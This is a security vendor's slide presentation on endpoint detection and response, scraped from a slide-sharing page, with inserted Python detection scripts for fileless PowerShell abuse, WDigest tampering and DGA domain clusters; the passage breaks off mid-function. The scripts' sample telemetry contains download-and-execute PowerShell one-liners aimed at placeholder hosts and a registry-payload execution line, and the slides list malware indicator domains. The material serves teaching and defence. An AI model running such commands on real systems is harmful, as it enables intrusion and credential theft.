© 2017 Cybereason Inc. All rights reserved.
What’s in your toolkit? The Case for EDR
Index
• This presentation:
• About Me
• About Cybereason
• My Job
• Disclaimers
• Products/Vendors
• Defense In Depth
• Examples
• Q/A
About me
• Hometown boy!
• CAL Alumni 2001
• Education
• USF (Double BA in Poli Sci and Finance)
• UofL (Post-Bac Cert in Accounting)
• Boston University MET (MS in Comp Sci)
• Work
• American Well: Security Analyst (2015)
• PayPal: Security Engineer (2016-2018)
• Cybereason: Security/Malware Analyst (2019)
• Other
• Jiu-Jitsu white belt (black belt in training)
About Cybereason
• Founded in 2012 by former members of the elite Israeli Defense Forces unit 8200
• Currently around 500 employees with $100+ million in funding, most of it from Japan's SoftBank
• Offices in Boston, Tel Aviv, Tokyo, London and Sydney (more coming soon)
What’s my job?
• Identify the malware before it spreads
• Drop unidentified malware into a sandbox
• Reverse-engineer malware
• Triage and make recommendations based on the type of malware
• Quarantine vs. re-image the machine
Disclaimer!
• I’m still learning!!!
Other Disclaimer
• EDR is not meant to be a be-all, end-all solution!
Which products? Who are the vendors?
Anti-virus
Firewall
WAF
New Generation Products
EDR
Defense in Depth
Recognize this?
Defense in Depth
The Layers
What is EDR?
Endpoint Detection and Response/Remediation
• Gives the full story
• Shows behaviors and uses data and predictive analytics to determine malicious behavior
• Addresses the need for continuous monitoring
• Combines many tools for a single purpose, which empowers the analyst, and whoever else is involved, to make sure the proper actions are taken
• In other words, it’s helpful!
Attack Lifecycle
Different types of Malware
APT vs. Commodity Malware
WannaCry
• NSA leak
• EternalBlue & DoublePulsar
APT vs. Commodity Malware
Stuxnet
Types of Malware
• PUP (potentially unwanted program)
• Applications that would be considered unwanted despite often having been downloaded by the user.
• Ransomware
• Threatens to publish the victim's data or perpetually block access to it (by encrypting it) unless a ransom is paid.
Types of Malware
• Dropper
• Malicious code that exists only to download other malicious code.
• Information-stealing malware
• Collects information from a victim’s computer and usually sends it to the attacker.
• Rootkit
• Malicious code designed to conceal the existence of other code.
Fileless Malware
• What is it?
• A legitimate process being run in the background
• Data saved in the Registry can be called by wscript
• A PowerShell one-liner (base64-encoded, etc.) pushes the payload straight into RAM
• Calling Invoke-Expression can run as admin, collect and receive data, and go undetected by typical AV, since this is a legitimate process
• Using the operating system against itself
• Cobalt Kitty →
Fileless Malware
• Current Trends
• 42% of companies surveyed by the Ponemon Institute reported experiencing at least one fileless malware attack in 2017, and 77% of all successful attacks were fileless. (https://digitalguardian.com/blog/what-fileless-malware-or-non-malware-attack-definition-and-best-practices-fileless-malware)
• In the first half of 2018 there was a 94% increase in fileless malware attacks and 5.2 PowerShell attacks per 1,000 endpoints, according to Threatpost (https://threatpost.com/threatlist-ransomware-attacks-down-fileless-malware-up-in-2018/136962/)
Mimikatz
• What is it?
• Open-source application (used both by red teams and by malicious individuals) to dump clear-text authentication credentials
• By default, since Windows 8.1, Windows won’t spit out clear-text passwords (WDigest)
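The behaviours on the Fileless Malware slides (encoded PowerShell one-liners, Invoke-Expression, a script host pulling its payload out of the Registry) and the WDigest point on the Mimikatz slide are exactly what an EDR's behavioural rules key on. What follows is an added example, not code from the slides or from Cybereason's product: two such rules in Python, run over a constructed set of endpoint telemetry events. The event schema (the dict keys), the hostnames, the HKCU:\Software\ExampleApp key and the payload.invalid URL are invented for the example; the WDigest key path and the UseLogonCredential value are the real Windows locations.

```python
"""Two EDR-style behavioural rules over constructed endpoint telemetry.

'suspicious-script-execution': PowerShell with an encoded command, an
Invoke-Expression / in-memory download, or a script-host parent; or a script
host (wscript/cscript/mshta) whose command line reads from the registry.
'wdigest-credential-caching': a registry write setting UseLogonCredential=1
under the WDigest provider key, which re-enables the clear-text caching that
Windows 8.1 turned off by default.
Event schema, hosts and URLs below are invented for this example.
"""
import base64
import re

PS_IMAGES = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell accepts unambiguous prefixes of -EncodedCommand, so all of these occur.
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}
IN_MEMORY = re.compile(r"invoke-expression|\biex\b|downloadstring|frombase64string", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
REGISTRY_REF = re.compile(r"HK(LM|CU|EY_)|GetObject\(", re.I)
WDIGEST_KEY = re.compile(r"\\Control\\SecurityProviders\\WDigest$", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENCODED_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16le", "ignore")
            except ValueError:  # bad base64 padding / length
                return ""
    return ""


def check_process(ev: dict) -> list:
    """Reasons a process_create event looks like fileless script abuse."""
    image, parent = basename(ev.get("image", "")), basename(ev.get("parent_image", ""))
    cmd = ev.get("cmdline", "")
    reasons = []
    if image in PS_IMAGES:
        decoded = decode_encoded_command(cmd)
        if decoded:
            reasons.append("encoded PowerShell command")
        if IN_MEMORY.search(cmd + " " + decoded):  # scan raw and decoded text
            reasons.append("Invoke-Expression / in-memory download")
        if parent in SCRIPT_HOSTS:
            reasons.append(f"PowerShell spawned by script host {parent}")
        # A hidden window alone is common in admin scripts; only count it on top
        # of a stronger signal.
        if reasons and HIDDEN.search(cmd):
            reasons.append("hidden window")
    elif image in SCRIPT_HOSTS and REGISTRY_REF.search(cmd):
        reasons.append("script host reading payload from the registry")
    return reasons


def check_registry(ev: dict) -> list:
    """Reasons a registry_set event matters: WDigest caching switched back on."""
    if (WDIGEST_KEY.search(ev.get("key", ""))
            and ev.get("value_name", "").lower() == "uselogoncredential"
            and str(ev.get("data")) == "1"):
        return ["WDigest UseLogonCredential set to 1 (clear-text caching re-enabled)"]
    return []


def evaluate(events: list) -> list:
    """Apply both rules; one finding per matching event, in event order."""
    findings = []
    for ev in events:
        if ev["type"] == "process_create":
            rule, reasons = "suspicious-script-execution", check_process(ev)
        elif ev["type"] == "registry_set":
            rule, reasons = "wdigest-credential-caching", check_registry(ev)
        else:
            continue
        if reasons:
            findings.append({"host": ev["host"], "rule": rule, "reasons": reasons})
    return findings


# Constructed sample telemetry (not real logs); payload.invalid is a placeholder.
STAGE2_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://payload.invalid/stage2')"
ENCODED_PAYLOAD = base64.b64encode(STAGE2_COMMAND.encode("utf-16le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"type": "process_create", "host": "ws01", "parent_image": r"C:\Windows\explorer.exe",
     "image": PS, "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"type": "process_create", "host": "ws01", "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": PS, "cmdline": f"powershell.exe -NoP -W Hidden -Enc {ENCODED_PAYLOAD}"},
    {"type": "process_create", "host": "ws02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\jdoe\AppData\Local\Temp\update.vbs"},
    {"type": "process_create", "host": "ws02", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": PS, "cmdline": r"powershell.exe -nop -c iex((Get-ItemProperty HKCU:\Software\ExampleApp).Payload)"},
    {"type": "registry_set", "host": "ws03", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "OneDrive", "data": r"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
    {"type": "registry_set", "host": "ws03", "key": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest",
     "value_name": "UseLogonCredential", "data": 1},
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['rule']}: {'; '.join(f['reasons'])}")
```

The benign PowerShell backup script and the OneDrive Run key produce no finding; the Word-spawned encoded one-liner, the wscript-spawned PowerShell that reads its payload from the registry, and the WDigest write each produce one. The point of the parent/child and decoded-payload checks is that a signature on the file would have nothing to match: there is no file.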
Emotet/Trickbot/Ryuk
Tiny Banker
The process ran DNS queries for the following (all resolving to the same address):
vqwgqnbtectr.pw > 216.218.185[.]162
sucjuv.in > 216.218.185[.]162
hbsnmsmlsvib.in > 216.218.185[.]162
ehhrupqrycm.pw > 216.218.185[.]162
uatuwc.pw > 216.218.185[.]162
fpexkrdtxpfs.in > 216.218.185[.]162
okzhyctznzft.pw > 216.218.185[.]162
zawmg.pw > 216.218.185[.]162
lxpcbahva.pw > 216.218.185[.]162
bifcp.in > 216.218.185[.]162
pojde.in > 216.218.185[.]162
And many, many more…
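The list above is the signal an analyst looks for: many throwaway, random-looking domains all resolving to one address. The following is an added example, not from the slides: a Python heuristic that parses records in the slide's "domain > ip" layout (defanged addresses included), scores each domain's main label for DGA-like character patterns, and alerts on any address fronting a cluster of such names. The .pw/.in domains and the 216.218.185[.]162 address are taken from the slide; the example.com/example.org records and their RFC 5737 documentation addresses are constructed benign background traffic, and the thresholds are assumptions to tune.

```python
"""Flag an IP that many random-looking domains resolve to (sinkhole / DGA pattern).

Input lines follow the slide's 'domain > ip' layout; defanged IPs are accepted.
Sample records: slide domains plus constructed benign example.com/.org traffic.
"""
import re
from collections import defaultdict

RECORD = re.compile(r"^\s*(?P<domain>[A-Za-z0-9.-]+)\s*>\s*(?P<ip>[0-9.\[\]]+)\s*$")
VOWELS = set("aeiou")

SAMPLE_LOG = """\
vqwgqnbtectr.pw > 216.218.185[.]162
sucjuv.in > 216.218.185[.]162
hbsnmsmlsvib.in > 216.218.185[.]162
ehhrupqrycm.pw > 216.218.185[.]162
update.example.com > 198.51.100.7
uatuwc.pw > 216.218.185[.]162
fpexkrdtxpfs.in > 216.218.185[.]162
cdn.example.com > 198.51.100.7
okzhyctznzft.pw > 216.218.185[.]162
zawmg.pw > 216.218.185[.]162
www.example.org > 203.0.113.10
lxpcbahva.pw > 216.218.185[.]162
And many, many more...
"""


def refang(ip: str) -> str:
    """Turn a defanged address like 216.218.185[.]162 back into 216.218.185.162."""
    return ip.replace("[.]", ".").replace("[", "").replace("]", "")


def parse_log(text: str) -> list:
    """Return (domain, ip) pairs; lines that are not 'domain > ip' are skipped."""
    records = []
    for line in text.splitlines():
        m = RECORD.match(line)
        if m:
            records.append((m.group("domain").lower().rstrip("."), refang(m.group("ip"))))
    return records


def registrable_label(domain: str) -> str:
    """Second-level label ('vqwgqnbtectr' for vqwgqnbtectr.pw). Simplification:
    no public-suffix list, so example.co.uk would yield 'co'."""
    labels = domain.split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def label_features(label: str) -> tuple:
    """(vowel ratio, longest consonant run) over the letters of a label."""
    letters = [c for c in label if c.isalpha()]
    if not letters:
        return 1.0, 0
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    run = longest = 0
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    return vowel_ratio, longest


def looks_generated(domain: str) -> bool:
    """Crude DGA test: few vowels or a long consonant run in the main label."""
    label = registrable_label(domain)
    if len(label) < 5:  # short labels give no usable statistics
        return False
    vowel_ratio, longest_run = label_features(label)
    return vowel_ratio <= 0.25 or longest_run >= 5


def find_sinkhole_clusters(records: list, min_domains: int = 5,
                           min_generated_ratio: float = 0.5) -> list:
    """Group by resolved IP; alert on IPs fronting many generated-looking names."""
    by_ip = defaultdict(set)
    for domain, ip in records:
        by_ip[ip].add(domain)
    alerts = []
    for ip, domains in sorted(by_ip.items()):
        if len(domains) < min_domains:
            continue
        generated = [d for d in domains if looks_generated(d)]
        ratio = len(generated) / len(domains)
        if ratio >= min_generated_ratio:
            alerts.append({"ip": ip, "domains": len(domains),
                           "generated": len(generated), "ratio": round(ratio, 2)})
    return alerts


if __name__ == "__main__":
    for alert in find_sinkhole_clusters(parse_log(SAMPLE_LOG)):
        print(alert)
```

The lexical test is deliberately crude (two of the slide's own domains, sucjuv.in and uatuwc.pw, pass it) and only ranks the cluster; the grouping by resolved address is the real signal, which is why the two example.com names sharing 198.51.100.7 stay below the threshold while the nine slide domains on one address do not.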
Demo
https://www.youtube.com/watch?v=Hc7h-rIyd5A
Q/A
• Feedback
• Joshua.chou@cybereason.com
• jdudeoflife
Thank you.
www.cybereason.com

Session 1 - Intro to Robotic Process Automation.pdf
UiPathCommunity
Ā 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
Ivo Velitchkov
Ā 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
Safe Software
Ā 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
DianaGray10
Ā 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
DanBrown980551
Ā 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Neo4j
Ā 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Antonios Katsarakis
Ā 
Principle of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptxPrinciple of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptx
BibashShahi
Ā 
What is an RPA CoE? Session 2 ā€“ CoE Roles
What is an RPA CoE?  Session 2 ā€“ CoE RolesWhat is an RPA CoE?  Session 2 ā€“ CoE Roles
What is an RPA CoE? Session 2 ā€“ CoE Roles
DianaGray10
Ā 
"What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w..."What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w...
Fwdays
Ā 
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
Fwdays
Ā 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
Fwdays
Ā 
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptxPRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
christinelarrosa
Ā 
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
AlexanderRichford
Ā 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
AstuteBusiness
Ā 

Recently uploaded (20)

AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)
Ā 
Christine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptxChristine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptx
Ā 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
Ā 
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
Ā 
A Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's ArchitectureA Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's Architecture
Ā 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
Ā 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
Ā 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
Ā 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Ā 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
Ā 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Ā 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Ā 
Principle of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptxPrinciple of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptx
Ā 
What is an RPA CoE? Session 2 ā€“ CoE Roles
What is an RPA CoE?  Session 2 ā€“ CoE RolesWhat is an RPA CoE?  Session 2 ā€“ CoE Roles
What is an RPA CoE? Session 2 ā€“ CoE Roles
Ā 
"What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w..."What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w...
Ā 
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
Ā 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
Ā 
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptxPRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
Ā 
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
Ā 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
Ā 

The Case for EDR: What's In Your Toolkit

  • 1. © 2017 Cybereason Inc. All rights reserved. What’s in your toolkit? The Case for EDR
  • 2. Index • This presentation: • About Me • About Cybereason • My Job • Disclaimers • Products/Vendors • Defense In Depth • Examples • Q/A
  • 3. About me • Hometown boy! • CAL Alumni 2001 • Education • USF (Double BA in Poly Sci and Finance) • UofL (Post Bac Cert in Accounting) • Boston University MET (MS in Comp Sci) • Work • American Well: Security Analyst (2015) • PayPal: Security Engineer (2016-2018) • Cybereason: Security/Malware Analyst (2019) • Other • Jiu-Jitsu white belt (black belt in training)
  • 4. About Cybereason • Founded in 2012 by former members of the elite Israeli Defense Force unit 8200 • Currently around 500 employees with $100+ million in funding, most of it from Japan’s SoftBank • Offices in Boston, Tel Aviv, Tokyo, London and Sydney (more coming soon)
  • 5. What’s my job? • Identify the malware before it spreads • Drop unidentified malware into a sandbox • Reverse engineer malware • Triage and make recommendations based on the type of malware • Quarantine vs. re-image the machine
  • 6. Disclaimer! • I’m still learning!!!
  • 7. Other Disclaimer • EDR is not meant to be a be-all, end-all solution!
  • 8. Which products? Who are the vendors? Anti-virus, Firewall, WAF
  • 9. New Generation Products: EDR
  • 10. Defense in Depth: Recognize this?
  • 11. Defense in Depth: The Layers
  • 12. What is EDR? Endpoint Detection and Response/Remediation • Gives a full story • Shows behaviors and uses data and predictive analytics to determine malicious behavior • Addresses the need for continuous monitoring • Combines many tools for a single purpose, which empowers the analyst, as well as the party involved, to make sure the proper actions are taken • In other words, it’s helpful!
  • 13. Attack Lifecycle
  • 14. Different types of Malware
  • 15. APT vs. Commodity Malware: WannaCry • NSA leak • EternalBlue & DoublePulsar
  • 16. APT vs. Commodity Malware: Stuxnet
  • 17. Types of Malware • PUP (potentially unwanted program) • Applications that would be considered unwanted despite often having been downloaded by the user. • Ransomware • Threatens to publish the victim’s data or perpetually block access to it (by encrypting it) unless a ransom is paid.
  • 18. Types of Malware • Dropper • Malicious code that exists only to download other malicious code. • Information-stealing malware • Collects information from a victim’s computer and usually sends it to the attacker. • Rootkit • Malicious code designed to conceal the existence of other code.
  • 19. Fileless Malware • What is it? • A legitimate process being run in the background • Data saved in the Registry can be called by wscript • A PowerShell one-liner (base64-encoded, etc.) pushes its code straight to RAM • Calling Invoke-Expression can run with admin rights, collect and receive data, and go undetected by typical AV, since this is a legitimate process • Using the operating system against itself • Cobalt Kitty
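The behaviours slide 19 lists (an encoded PowerShell one-liner, Invoke-Expression, payload data parked in the Registry, a scripting host or Office application as the parent process) are exactly what an EDR or SIEM rule keys on in process-creation telemetry. The following is an added example, not code from the presentation or from Cybereason: a small Python detector run over constructed process-creation records. The record format (`timestamp|host|parent_image|image|command_line`), the indicator list, the parent-process list and the sample lines are all assumptions made for this example.

```python
"""Detect fileless-style PowerShell launches in process-creation records.

Added example (not from the presentation). Record format and samples
are constructed; the indicator names are assumptions for illustration.
"""
import base64
import re
from typing import List, NamedTuple, Optional


class Finding(NamedTuple):
    line_no: int
    host: str
    reasons: List[str]
    decoded: Optional[str]


# powershell.exe accepts any unambiguous prefix of -EncodedCommand; this
# matches the short forms seen most often. A production rule would cover more.
ENC_FLAG = re.compile(r"(?i)\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Behaviours named on slide 19, matched against the raw command line and the
# decoded payload: Invoke-Expression, Registry-resident data, in-memory
# download/decode, hidden windows.
INDICATORS = [
    ("invoke-expression", re.compile(r"(?i)invoke-expression|\biex\b")),
    ("registry-read", re.compile(r"(?i)get-itemproperty|hk(?:cu|lm):|registry::")),
    ("in-memory-download", re.compile(r"(?i)downloadstring|downloaddata|invoke-webrequest")),
    ("base64-decode", re.compile(r"(?i)frombase64string")),
    ("hidden-window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
]

# Parents that should not normally spawn PowerShell (assumed list).
SUSPICIOUS_PARENTS = {"wscript.exe", "cscript.exe", "winword.exe", "excel.exe", "mshta.exe"}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries -EncodedCommand, else None.

    powershell.exe expects base64 of the UTF-16LE script text.
    """
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze_line(line_no: int, line: str) -> Optional[Finding]:
    """Score one 'timestamp|host|parent_image|image|command_line' record."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None
    _ts, host, parent, image, cmdline = parts
    if image.lower() not in ("powershell.exe", "pwsh.exe"):
        return None
    reasons: List[str] = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded-command")
    haystack = cmdline + "\n" + (decoded or "")
    for name, rx in INDICATORS:
        if rx.search(haystack):
            reasons.append(name)
    if parent.lower() in SUSPICIOUS_PARENTS:
        reasons.append("unusual-parent:" + parent.lower())
    # An encoded command on its own is common in admin tooling; require a
    # second signal before raising a finding.
    if len(reasons) < 2:
        return None
    return Finding(line_no, host, reasons, decoded)


def scan(lines) -> List[Finding]:
    return [f for f in (analyze_line(i, l) for i, l in enumerate(lines, 1)) if f]


def encode_command(script: str) -> str:
    """Build the base64 form that powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records, not real telemetry.
SAMPLE_LOG = [
    "2019-03-01T10:00:01|ws01|explorer.exe|powershell.exe|powershell.exe -File C:\\scripts\\backup.ps1",
    "2019-03-01T10:00:02|ws01|services.exe|powershell.exe|powershell.exe -enc " + encode_command("Get-Date"),
    "2019-03-01T10:00:03|ws02|wscript.exe|powershell.exe|powershell.exe -nop -w hidden -enc "
    + encode_command("Invoke-Expression (Get-ItemProperty HKCU:\\Software\\Example).Payload"),
    "2019-03-01T10:00:04|ws03|winword.exe|powershell.exe|powershell.exe -NoProfile -Command "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no} host={f.host} reasons={','.join(f.reasons)}")
```

Only records 3 and 4 are reported: record 2 is an encoded command with no other signal, which is how many management agents invoke PowerShell, so a single indicator is deliberately not enough. Decoding the payload before matching is the important step; the base64 blob itself carries none of the words the indicators look for.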
  • 20. Fileless Malware • Current Trends • 42% of companies surveyed by the Ponemon Institute reported experiencing at least one fileless malware attack in 2017, and 77% of all successful attacks were fileless. (https://digitalguardian.com/blog/what-fileless-malware-or-non-malware-attack-definition-and-best-practices-fileless-malware) • In the first half of 2018 there was a 94% increase in fileless malware attacks and 5.2 PowerShell attacks per 1,000 endpoints, according to Threatpost (https://threatpost.com/threatlist-ransomware-attacks-down-fileless-malware-up-in-2018/136962/)
  • 21. Mimikatz • What is it? • Open-source application (used both by red teams and malicious individuals) to dump clear-text authentication credentials • By default, since Windows 8.1, it won’t spit out clear-text passwords (WDigest)
  • 22. Emotet/Trickbot/Ryuk
  • 23. Emotet/Trickbot/Ryuk
  • 24. Emotet/Trickbot/Ryuk
  • 25. Emotet/Trickbot/Ryuk
  • 26. Emotet/Trickbot/Ryuk
  • 27. Tiny Banker
  • 28. Tiny Banker
  • 29. Tiny Banker The process ran a DNS query to the following: vqwgqnbtectr.pw > 216.218.185[.]162, sucjuv.in > 216.218.185[.]162, hbsnmsmlsvib.in > 216.218.185[.]162, ehhrupqrycm.pw > 216.218.185[.]162, uatuwc.pw > 216.218.185[.]162, fpexkrdtxpfs.in > 216.218.185[.]162, okzhyctznzft.pw > 216.218.185[.]162, zawmg.pw > 216.218.185[.]162, lxpcbahva.pw > 216.218.185[.]162, bifcp.in > 216.218.185[.]162, pojde.in > 216.218.185[.]162 … and many, many more.
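Slide 29 shows the tell-tale of a domain-generation algorithm: many random-looking names, all resolving to a single address. Grouping DNS answers by resolved IP is how a detection rule surfaces this without knowing any of the names in advance. The following is an added example, not code from the presentation: a Python script that parses `domain > ip` records, refangs the `[.]` notation, scores each registrable label with a simple vowel-ratio and consonant-run heuristic, and flags addresses where most of the names look generated. The slide’s own query list is used as sample input; the benign records for 203.0.113.10 and 198.51.100.7 (documentation address ranges), the thresholds and the heuristic are constructed for this example.

```python
"""Cluster DNS answers by resolved IP and flag DGA-like clusters.

Added example (not from the presentation). The heuristic and the benign
sample records are constructed; the flagged records are the slide's own.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, Iterator, List, NamedTuple, Set, Tuple

VOWELS = set("aeiou")
CONSONANT_RUN = re.compile(r"[b-df-hj-np-tv-z]+")
LINE_RX = re.compile(r"^\s*(?P<domain>[A-Za-z0-9.-]+)\s*>\s*(?P<ip>[\d\[\].]+)\s*$")


class Cluster(NamedTuple):
    ip: str
    domains: List[str]
    dga_like: int


def refang(ip: str) -> str:
    """Turn the analyst notation 216.218.185[.]162 back into a plain address."""
    return ip.replace("[.]", ".")


def registrable_label(domain: str) -> str:
    """Second-level label, e.g. 'vqwgqnbtectr' for 'vqwgqnbtectr.pw'.

    Naive split: does not handle multi-part public suffixes such as co.uk.
    """
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def looks_generated(label: str) -> bool:
    """Crude DGA test: few vowels, or a long run of consonants (assumed thresholds)."""
    label = label.lower()
    letters = [c for c in label if c.isalpha()]
    if not letters:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
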